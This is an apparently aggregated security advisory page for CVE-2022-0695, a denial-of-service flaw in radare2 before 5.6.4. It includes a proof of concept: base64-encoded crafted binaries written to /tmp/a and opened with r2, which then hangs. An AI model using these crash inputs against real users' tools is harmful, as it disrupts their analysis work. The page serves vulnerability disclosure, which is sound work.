Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-0695: Denial of Service in radare2

Denial of Service in GitHub repository radareorg/radare2 prior to 5.6.4.

CVE
Open in Source
#vulnerability#dos#git

Description

R2 will hang for several crafted binaries.

Proof of Concept

printf "%s" "AAA4AAAAAB4=" | base64 -d > /tmp/a
# printf "%s" "z/rt/gwAAAEuAAB//wAAAACe2QEaAAAG+s8yAOH/AQAAAA==" | base64 -d > /tmp/a
# printf "%s" "zvrt/gCd7QBMYWT6AAD6/2NiQGsOAAGbuAAAADQAAID7AAAAAAEAAAEBZWUgcmR4LCByY3gBHQAAABEAAAAB/wAA7wABAAFiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiY2JiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJi/3///2KdYmJidmJiZc767QIA/38BAAr/7n/WAc767QAAAgD2AB0AABAFAAAVAQAAAAHv7+/v7+/v7+/v729jYWwvc2hhcmUvcmFkYXJlMi9wZGJ4QAAAAAQAAAEBYmVxPwCQHckEAAAAANBEyQR6ABQAkETJBAAAAAAhAAAAAAIAAAAQAAIAAAAQEAAAEgAAAAEAAABlYXhAKysBAA==" | base64 -d > /tmp/a
r2 /tmp/a # This hangs forever.

Impact

This vulnerability is capable of denial of service locally.

Occurrences

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE